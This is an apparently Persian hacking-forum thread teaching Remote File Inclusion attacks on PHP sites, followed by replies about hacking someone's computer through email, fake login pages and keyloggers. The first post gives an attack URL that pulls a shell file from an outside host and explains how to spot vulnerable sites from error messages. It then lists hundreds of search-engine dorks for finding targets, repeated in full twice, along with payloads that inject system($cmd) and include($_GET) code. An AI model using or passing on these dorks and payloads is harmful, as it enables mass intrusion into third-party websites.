آموزش کامل باگ Remote File Include

رتبه موضوع:
  • 1 رای - 3 میانگین
  • 1
  • 2
  • 3
  • 4
  • 5
آموزش کامل باگ Remote File Include
#1
درود بر عزیزان در این آموزش در خدمت شما هستیم با توضیحاتی راجع به باگ Rfi در خدمت شما هستیم این باگ مخفف کلمه Remote File Inclusion که معنی پارسی آن کنترل از راه دور یک فایل میباشد و اما این باگ چگونه رخ میدهد ، این باگ در مواقعی رخ میدهد که برنامه نویس در هنگام استفاده از توابع درخواست یک فایل اشتباهی انجام دهد . این توابع میتواند شامل get_include_path , get_included_files, get_loaded_extensions ,Include , Require و ... باشد که یک فایل را از آدرسی گرفته و عملیاتی که برنامه نویس برای آن تعریف کرده را انجام میدهد حال اگر برنامه نویس در تعریف این توابع اشتباهی انجام دهد منجر به ایجاد باگ میشود که به جای فایل دریافتی ما فایل خود را جاگزین میکنیم و در نهایت فایل ما لود میشود
كد های بالا را در يك فولدر با پسوند Php ذخيره كنيد و در سرور قرار دهید حالا اجرا کنید خواهيد ديد كه وقتي كد اول را اجرا ميكنيد جمله Google.CoM در صفحه چاپ میشود یا همون نمایش .
اگر توانستیم به Include مقداری ارسال کنیم و صفحه ما بارگذاری شود آن کد Rfi دارد
در کد بالا تابع Rfi با مقداری که به Get میدهیم مقدار دهی میشود .
که به این صورت میتوانیم به متغیر مقدار دهی کنیم :

کد:
site.com/index.php?bug=File Src
و در جهت نفوذ آدرس فایل را خودمان وارد میکنیم مثلا :


کد:
site.com/index.php?get=http://shell.com/shell.txt?
و فایل ما اجرا میشود . روش شناسایی این باگ بصورتی است که شما به یک ادرس اینچنینی برخورد میکنید :


کد:
site.com/index.php?page=cyber.Html
یک کاراکتر به انتهای نام اضافه کنید :


کد:
site.com/index.php?page=cyber.Html*
حال اگر برنامه نویس در مقدار دهی دقت نکرده باشد با خطای مشابه زیر روبه رو میشویم و این نشان دهنده وجود باگ RFI میباشد .


کد:
Warning: include(index.php) [function.include]: failed to open stream: No such file or directory in C:\Serv\www\rfi.php on line 2


کد:
Warning: include() [function.include]: Failed opening index.php' for inclusion (include_path='.;C:\php5\pear') in Serv\www\rfi.php on line 2
دقت داشته باشین هر خطایی مبتنی بر داشتن باگ RFI نیست و میتونه باگ LFI باشه

تارگت تمرین : You are not allowed to view links. Register or Login to view.

Shoma ejaze didane link ra nadarid sabte name konid Ya vared shavid
?


RFI Dorks
کد:
inurl:/modules/My_eGallery/public/displayCategory.php?basepath=

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

inurl:/include/new-visitor.inc.php?lvc_include_dir=

inurl:/_functions.php?prefix=

inurl:/cpcommerce/_functions.php?prefix=

inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/ashnews.php?pathtoashnews=

inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=

inurl:/pm/lib.inc.php?pm_path=

inurl:/b2-tools/gm-2-b2.php?b2inc=

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/includes/include_once.php?include_file=

inurl:/e107/e107_handlers/secure_img_render.php?p=

inurl:/shoutbox/expanded.php?conf=

inurl:/main.php?x=

inurl:/myPHPCalendar/admin.php?cal_dir=

inurl:/index.php/main.php?x=

inurl:/index.php?include=

inurl:/index.php?x=

inurl:/index.php?open=

inurl:/index.php?visualizar=

inurl:/template.php?pagina=

inurl:/index.php?pagina=

inurl:/index.php?inc=

inurl:/includes/include_onde.php?include_file=

inurl:/index.php?page=

inurl:/index.php?pg=

inurl:/index.php?show=

inurl:/index.php?cat=

inurl:/index.php?file=

inurl:/db.php?path_local=

inurl:/index.php?site=

inurl:/htmltonuke.php?filnavn=

inurl:/livehelp/inc/pipe.php?HCL_path=

inurl:/hcl/inc/pipe.php?HCL_path=

inurl:/inc/pipe.php?HCL_path=

inurl:/support/faq/inc/pipe.php?HCL_path=

inurl:/help/faq/inc/pipe.php?HCL_path=

inurl:/helpcenter/inc/pipe.php?HCL_path=

inurl:/live-support/inc/pipe.php?HCL_path=

inurl:/gnu3/index.php?doc=

inurl:/gnu/index.php?doc=

inurl:/phpgwapi/setup/tables_update.inc.php?appdir=

inurl:/forum/install.php?phpbb_root_dir=

inurl:/includes/calendar.php?phpc_root_path=

inurl:/includes/setup.php?phpc_root_path=

inurl:/inc/authform.inc.php?path_pre=

inurl:/include/authform.inc.php?path_pre=

inurl:index.php?nic=

inurl:index.php?sec=

inurl:index.php?content=

inurl:index.php?link=

inurl:index.php?filename=

inurl:index.php?dir=

inurl:index.php?document=

inurl:index.php?view=

inurl:*.php?sel=

inurl:*.php?session=&content=

inurl:*.php?locate=

inurl:*.php?place=

inurl:*.php?layout=

inurl:*.php?go=

inurl:*.php?catch=

inurl:*.php?mode=

inurl:*.php?name=

inurl:*.php?loc=

inurl:*.php?f=

inurl:*.php?inf=

inurl:*.php?pg=

inurl:*.php?load=

inurl:*.php?naam=

allinurl:/index.php?page= site:*.dk

allinurl:/index.php?file= site:*.dk

INURL OR ALLINURL WITH:

/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=

/includes/header.php?systempath=

/Gallery/displayCategory.php?basepath=

/index.inc.php?PATH_Includes=

/ashnews.php?pathtoashnews=

/ashheadlines.php?pathtoashnews=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/demo/includes/init.php?user_inc=

/jaf/index.php?show=

/inc/shows.inc.php?cutepath=

/poll/admin/common.inc.php?base_path=

/pollvote/pollvote.php?pollname=

/sources/post.php?fil_config=

/modules/My_eGallery/public/displayCategory.php?basepath=

/bb_lib/checkdb.inc.php?libpach=

/include/livre_include.php?no_connect=lol&chem_absolu=

/index.php?from_market=Y&pageurl=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/pivot/modules/module_db.php?pivot_path=

/modules/4nAlbum/public/displayCategory.php?basepath=

/derniers_commentaires.php?rep=

/modules/coppermine/themes/default/theme.php?THEME_DIR=

/modules/coppermine/include/init.inc.php?CPG_M_DIR=

/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=

/coppermine/themes/maze/theme.php?THEME_DIR=

/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=

/myPHPCalendar/admin.php?cal_dir=

/agendax/addevent.inc.php?agendax_path=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=

/main.php?page=

/default.php?page=

/index.php?action=

/index1.php?p=

/index2.php?x=

/index2.php?content=

/index.php?conteudo=

/index.php?cat=

/include/new-visitor.inc.php?lvc_include_dir=

/modules/agendax/addevent.inc.php?agendax_path=

/shoutbox/expanded.php?conf=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/pivot/modules/module_db.php?pivot_path=

/library/editor/editor.php?root=

/library/lib.php?root=

/e107/e107_handlers/secure_img_render.php?p=

/zentrack/index.php?configFile=

/main.php?x=

/becommunity/community/index.php?pageurl=

/GradeMap/index.php?page=

/index4.php?body=

/side/index.php?side=

/main.php?page=

/es/index.php?action=

/index.php?sec=

/index.php?main=

/index.php?sec=

/index.php?menu=

/html/page.php?page=

/page.php?view=

/index.php?menu=

/main.php?view=

/index.php?page=

/content.php?page=

/main.php?page=

/index.php?x=

/main_site.php?page=

/index.php?L2=

/content.php?page=

/main.php?page=

/index.php?x=

/main_site.php?page=

/index.php?L2=

/index.php?show=

/tutorials/print.php?page=

/index.php?page=

/index.php?level=

/index.php?file=

/index.php?inter_url=

/index.php?page=

/index2.php?menu=

/index.php?level=

/index1.php?main=

/index1.php?nav=

/index1.php?link=

/index2.php?page=

/index.php?myContent=

/index.php?TWC=

/index.php?sec=

/index1.php?main=

/index2.php?page=

/index.php?babInstallPath=

/main.php?body=

/index.php?z=

/main.php?view=

/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

/index.php?file=

/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=


1. allinurl:my_egallery site:.org
/modules/My_eGallery/public/displayCategory.php?basepath=

2. allinurl:xgallery site:.org
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

3. allinurl:coppermine site:.org
/modules/coppermine/themes/default/theme.php?THEME_DIR=

4. allinurl:4nAlbum site:.org
/modules/4nAlbum/public/displayCategory.php?basepath=

5. allinurlP:NphpBB2 site:.org
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

6. allinurl:ihm.php?p=

7. Keyword : "powered by AllMyLinks"
/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

8. allinurl:/modules.php?name=allmyguests
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

9. allinurl:/Popper/index.php?
/Popper/index.php?childwindow.inc.php?form=

10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
yahoo = by Kietu? v 3.2
/kietu/index.php?kietu[url_hit]=

11. keyword : "Powered by phpBB 2.0.6"
/html&highlight=%2527.include($_GET[a]),exit.%2527&a=

12. keyword : "powered by CubeCart 3.0.6"
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

13. keyword : "powered by paBugs 2.0 Beta 3"
/class.mysql.php?path_to_bt_dir=

14. allinurl:"powered by AshNews", allinurl:AshNews atau allinurl: /ashnews.php
/ashnews.php?pathtoashnews=

15. keyword : /phorum/login.php
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

16. allinurl:ihm.php?p=*

14. keyword : "powered eyeOs"
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cmd=id
diganti dengan :
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d);&a=

15. allinurl:.php?bodyfile=

16. allinurl:/includes/orderSuccess.inc.php?glob=
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

17. allinurl:forums.html
/modules.php?name=

18. allinurl:/default.php?page=home

19. allinurl:/folder.php?id=

20. allinurl:main.php?pagina=
/paginedinamiche/main.php?pagina=

21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( "powered by AllMyGuests")
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

22. allinurl:application.php?base_path=
/application.php?base_path=

23. allinurlp:hplivehelper
/phplivehelper/initiate.php?abs_path=

24. allinurlp:hpnuke
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

25. key word : "powered by Fantastic News v2.1.2"
/archive.php?CONFIG[script_path]=

26. keyword: "powered by smartblog" AND inurl:?page=login
/index.php?page=

27. allinurl:/forum/
/forum/admin/index.php?inc_conf=

28. keyword:"Powered By FusionPHP"
/templates/headline_temp.php?nst_inc=

29. allinurl:shoutbox/expanded.php filetypep:hp
/shoutbox/expanded.php?conf=

30. allinurl: /osticket/
/osticket/include/main.php?config[search_disp]=true&include_dir=

31. keyword : "Powered by iUser"
/common.php?include_path=

32. allinurl: "static.php?load="
/static.php?load=

33. keyworld : /phpcoin/login.php
/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=

34. keyworld: allinurl:/phpGedview/login.php site:
/help_text_vars.php?dir&PGV_BASE_DIRECTORY=

35. allinurl:/folder.php?id=
/classes.php?LOCAL_PATH=

inurl:"/lire.php?rub="

inurl:"/os/pointer.php?url="

inurl:"folder.php?id="

inurl:"show.php?page="

inurl:"index2.php?DoAction="

inurl:"index.php?canal="

inurl:"index.php?screen="

inurl:"index.php?langc="

inurl:"index.php?Language="

inurl:"view.php?page="

dork: "powered by doodle cart"
rfi of this dork: enc/content.php?Home_Path=

dork: "Login to Calendar"
rfi of this dork: /embed/day.php?path=

dork: "powered by EQdkp"
rfi of this dork: /includes/dbal.php?eqdkp_root_path=

inurl:"template.php?goto="

inurl:"video.php?content="

inurl:"pages.php?page="

inurl:"index1.php?choix="

inurl:"index1.php?menu="

inurl:"index2.php?ascii_seite="

dork: inurl:surveys
rfi to this dork: /surveys/survey.inc.php?path=

inurl:"index.php?body="

dork: allinurl:adobt sitel
rfi to this dork: /classes/adodbt/sql.php?classes_dir=

dork: "Powered By ScozNews"
rfi to this dork: /sources/functions.php?CONFIG[main_path]=
rfi to this dork: /sources/template.php?CONFIG[main_path]=

inurl:"kb_constants.php?module_root_path="

dork: allinurl:"mcf.php"
rfi to this dork: /mcf.php?content=

dork: inurl:"main.php?sayfa="
rfi to this dork: /main.php?sayfa=

dork: "MobilePublisherPHP"
rfi to this dork: /header.php?abspath=

dork: "powered by phpCOIN 1.2.3"
rfi to rhis dork: /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=

allinurl:login.php?dir=

inurl:"index.php?go="

inurl:"index1.php?="

inurl:"lib/gore.php?libpath="

inurl:"index2.php?p="

Rfi Dorks

کد:
inurl:/modules/My_eGallery/public/displayCategory.php?basepath=

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

inurl:/include/new-visitor.inc.php?lvc_include_dir=

inurl:/_functions.php?prefix=

inurl:/cpcommerce/_functions.php?prefix=

inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/ashnews.php?pathtoashnews=

inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=

inurl:/pm/lib.inc.php?pm_path=

inurl:/b2-tools/gm-2-b2.php?b2inc=

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/includes/include_once.php?include_file=

inurl:/e107/e107_handlers/secure_img_render.php?p=

inurl:/shoutbox/expanded.php?conf=

inurl:/main.php?x=

inurl:/myPHPCalendar/admin.php?cal_dir=

inurl:/index.php/main.php?x=

inurl:/index.php?include=

inurl:/index.php?x=

inurl:/index.php?open=

inurl:/index.php?visualizar=

inurl:/template.php?pagina=

inurl:/index.php?pagina=

inurl:/index.php?inc=

inurl:/includes/include_onde.php?include_file=

inurl:/index.php?page=

inurl:/index.php?pg=

inurl:/index.php?show=

inurl:/index.php?cat=

inurl:/index.php?file=

inurl:/db.php?path_local=

inurl:/index.php?site=

inurl:/htmltonuke.php?filnavn=

inurl:/livehelp/inc/pipe.php?HCL_path=

inurl:/hcl/inc/pipe.php?HCL_path=

inurl:/inc/pipe.php?HCL_path=

inurl:/support/faq/inc/pipe.php?HCL_path=

inurl:/help/faq/inc/pipe.php?HCL_path=

inurl:/helpcenter/inc/pipe.php?HCL_path=

inurl:/live-support/inc/pipe.php?HCL_path=

inurl:/gnu3/index.php?doc=

inurl:/gnu/index.php?doc=

inurl:/phpgwapi/setup/tables_update.inc.php?appdir=

inurl:/forum/install.php?phpbb_root_dir=

inurl:/includes/calendar.php?phpc_root_path=

inurl:/includes/setup.php?phpc_root_path=

inurl:/inc/authform.inc.php?path_pre=

inurl:/include/authform.inc.php?path_pre=

inurl:index.php?nic=

inurl:index.php?sec=

inurl:index.php?content=

inurl:index.php?link=

inurl:index.php?filename=

inurl:index.php?dir=

inurl:index.php?document=

inurl:index.php?view=

inurl:*.php?sel=

inurl:*.php?session=&content=

inurl:*.php?locate=

inurl:*.php?place=

inurl:*.php?layout=

inurl:*.php?go=

inurl:*.php?catch=

inurl:*.php?mode=

inurl:*.php?name=

inurl:*.php?loc=

inurl:*.php?f=

inurl:*.php?inf=

inurl:*.php?pg=

inurl:*.php?load=

inurl:*.php?naam=

allinurl:/index.php?page= site:*.dk

allinurl:/index.php?file= site:*.dk

INURL OR ALLINURL WITH:

/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=

/includes/header.php?systempath=

/Gallery/displayCategory.php?basepath=

/index.inc.php?PATH_Includes=

/ashnews.php?pathtoashnews=

/ashheadlines.php?pathtoashnews=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/demo/includes/init.php?user_inc=

/jaf/index.php?show=

/inc/shows.inc.php?cutepath=

/poll/admin/common.inc.php?base_path=

/pollvote/pollvote.php?pollname=

/sources/post.php?fil_config=

/modules/My_eGallery/public/displayCategory.php?basepath=

/bb_lib/checkdb.inc.php?libpach=

/include/livre_include.php?no_connect=lol&chem_absolu=

/index.php?from_market=Y&pageurl=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/pivot/modules/module_db.php?pivot_path=

/modules/4nAlbum/public/displayCategory.php?basepath=

/derniers_commentaires.php?rep=

/modules/coppermine/themes/default/theme.php?THEME_DIR=

/modules/coppermine/include/init.inc.php?CPG_M_DIR=

/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=

/coppermine/themes/maze/theme.php?THEME_DIR=

/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=

/myPHPCalendar/admin.php?cal_dir=

/agendax/addevent.inc.php?agendax_path=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=

/main.php?page=

/default.php?page=

/index.php?action=

/index1.php?p=

/index2.php?x=

/index2.php?content=

/index.php?conteudo=

/index.php?cat=

/include/new-visitor.inc.php?lvc_include_dir=

/modules/agendax/addevent.inc.php?agendax_path=

/shoutbox/expanded.php?conf=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/pivot/modules/module_db.php?pivot_path=

/library/editor/editor.php?root=

/library/lib.php?root=

/e107/e107_handlers/secure_img_render.php?p=

/zentrack/index.php?configFile=

/main.php?x=

/becommunity/community/index.php?pageurl=

/GradeMap/index.php?page=

/index4.php?body=

/side/index.php?side=

/main.php?page=

/es/index.php?action=

/index.php?sec=

/index.php?main=

/index.php?sec=

/index.php?menu=

/html/page.php?page=

/page.php?view=

/index.php?menu=

/main.php?view=

/index.php?page=

/content.php?page=

/main.php?page=

/index.php?x=

/main_site.php?page=

/index.php?L2=

/content.php?page=

/main.php?page=

/index.php?x=

/main_site.php?page=

/index.php?L2=

/index.php?show=

/tutorials/print.php?page=

/index.php?page=

/index.php?level=

/index.php?file=

/index.php?inter_url=

/index.php?page=

/index2.php?menu=

/index.php?level=

/index1.php?main=

/index1.php?nav=

/index1.php?link=

/index2.php?page=

/index.php?myContent=

/index.php?TWC=

/index.php?sec=

/index1.php?main=

/index2.php?page=

/index.php?babInstallPath=

/main.php?body=

/index.php?z=

/main.php?view=

/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

/index.php?file=

/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=


1. allinurl:my_egallery site:.org
/modules/My_eGallery/public/displayCategory.php?basepath=

2. allinurl:xgallery site:.org
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

3. allinurl:coppermine site:.org
/modules/coppermine/themes/default/theme.php?THEME_DIR=

4. allinurl:4nAlbum site:.org
/modules/4nAlbum/public/displayCategory.php?basepath=

5. allinurlP:NphpBB2 site:.org
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

6. allinurl:ihm.php?p=

7. Keyword : "powered by AllMyLinks"
/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

8. allinurl:/modules.php?name=allmyguests
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

9. allinurl:/Popper/index.php?
/Popper/index.php?childwindow.inc.php?form=

10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
yahoo = by Kietu? v 3.2
/kietu/index.php?kietu[url_hit]=

11. keyword : "Powered by phpBB 2.0.6"
/html&highlight=%2527.include($_GET[a]),exit.%2527&a=

12. keyword : "powered by CubeCart 3.0.6"
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

13. keyword : "powered by paBugs 2.0 Beta 3"
/class.mysql.php?path_to_bt_dir=

14. allinurl:"powered by AshNews", allinurl:AshNews atau allinurl: /ashnews.php
/ashnews.php?pathtoashnews=

15. keyword : /phorum/login.php
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

16. allinurl:ihm.php?p=*

14. keyword : "powered eyeOs"
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cmd=id
diganti dengan :
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d);&a=

15. allinurl:.php?bodyfile=

16. allinurl:/includes/orderSuccess.inc.php?glob=
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

17. allinurl:forums.html
/modules.php?name=

18. allinurl:/default.php?page=home

19. allinurl:/folder.php?id=

20. allinurl:main.php?pagina=
/paginedinamiche/main.php?pagina=

21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( "powered by AllMyGuests")
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

22. allinurl:application.php?base_path=
/application.php?base_path=

23. allinurlp:hplivehelper
/phplivehelper/initiate.php?abs_path=

24. allinurlp:hpnuke
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

25. key word : "powered by Fantastic News v2.1.2"
/archive.php?CONFIG[script_path]=

26. keyword: "powered by smartblog" AND inurl:?page=login
/index.php?page=

27. allinurl:/forum/
/forum/admin/index.php?inc_conf=

28. keyword:"Powered By FusionPHP"
/templates/headline_temp.php?nst_inc=

29. allinurl:shoutbox/expanded.php filetypep:hp
/shoutbox/expanded.php?conf=

30. allinurl: /osticket/
/osticket/include/main.php?config[search_disp]=true&include_dir=

31. keyword : "Powered by iUser"
/common.php?include_path=

32. allinurl: "static.php?load="
/static.php?load=

33. keyworld : /phpcoin/login.php
/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=

34. keyworld: allinurl:/phpGedview/login.php site:
/help_text_vars.php?dir&PGV_BASE_DIRECTORY=

35. allinurl:/folder.php?id=
/classes.php?LOCAL_PATH=

inurl:"/lire.php?rub="

inurl:"/os/pointer.php?url="

inurl:"folder.php?id="

inurl:"show.php?page="

inurl:"index2.php?DoAction="

inurl:"index.php?canal="

inurl:"index.php?screen="

inurl:"index.php?langc="

inurl:"index.php?Language="

inurl:"view.php?page="

dork: "powered by doodle cart"
rfi of this dork: enc/content.php?Home_Path=

dork: "Login to Calendar"
rfi of this dork: /embed/day.php?path=

dork: "powered by EQdkp"
rfi of this dork: /includes/dbal.php?eqdkp_root_path=

inurl:"template.php?goto="

inurl:"video.php?content="

inurl:"pages.php?page="

inurl:"index1.php?choix="

inurl:"index1.php?menu="

inurl:"index2.php?ascii_seite="

dork: inurl:surveys
rfi to this dork: /surveys/survey.inc.php?path=

inurl:"index.php?body="

dork: allinurl:adobt sitel
rfi to this dork: /classes/adodbt/sql.php?classes_dir=

dork: "Powered By ScozNews"
rfi to this dork: /sources/functions.php?CONFIG[main_path]=
rfi to this dork: /sources/template.php?CONFIG[main_path]=

inurl:"kb_constants.php?module_root_path="

dork: allinurl:"mcf.php"
rfi to this dork: /mcf.php?content=

dork: inurl:"main.php?sayfa="
rfi to this dork: /main.php?sayfa=

dork: "MobilePublisherPHP"
rfi to this dork: /header.php?abspath=

dork: "powered by phpCOIN 1.2.3"
rfi to rhis dork: /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=

allinurl:login.php?dir=

inurl:"index.php?go="

inurl:"index1.php?="

inurl:"lib/gore.php?libpath="

inurl:"index2.php?p="
پاسخ }}
سپاس شده توسط: Cheshmak ، !hossein! ، AliEnPi ، kingfardin
#2
سلام چطور یه برنامه بنویسم که گذاشتن ایمیل یا جیمیل داخلش  بتونم سیستم کسی ه_ک کنم . مثل ساختن یک لینک  ممنون میشم اموزششو برام ایمیل کنین16
پاسخ }}
سپاس شده توسط:
#3
(03-04-2016, 02:29 AM)bagban نوشته: You are not allowed to view links. Register or Login to view.

Shoma ejaze didane link ra nadarid sabte name konid Ya vared shavid
سلام چطور یه برنامه بنویسم که گذاشتن ایمیل یا جیمیل داخلش  بتونم سیستم کسی ه_ک کنم . مثل ساختن یک لینک  ممنون میشم اموزششو برام ایمیل کنین16

با فیک پیج میشه 
ولی بستگی داره شما هدفت از ه_ک سیستم ه_ک چیا باشه
[عکس: nq8ptqrhzmoqvaef4mct.gif]
پاسخ }}
سپاس شده توسط:
#4
منظورتو متوجه نشدن
ماشالا فارسی حرف نمیزنین که:|
یه برنامه بنویسی که ار جیمیل بفرستی واس کسی و به سیستمش نفوذ کنی = Keylogger
یه برنامه که جیمیل بزاری توش ه_ک کنه = نداریم
ایمیل یاهو فک میکنم هنوز کرک میشه ولی جیمیل نه!
پاسخ }}
سپاس شده توسط:
 


پرش به انجمن:


کاربران در حال بازدید این موضوع: 2 مهمان

درباره بدباز

بدباز کار خود را در سال 1390 با ساخت وب های www.ma3oud.mw.Lt و www.badbuzz.mw.Lt شروع کرده و در سال 1391 در تاریخ 1391/01/23 برنامه نویسی در رابطه با مسنجر نیمباز شروع کرده و هم اکنون با بیش از پانزده برنامه نویس به کار خود ادامه میدهد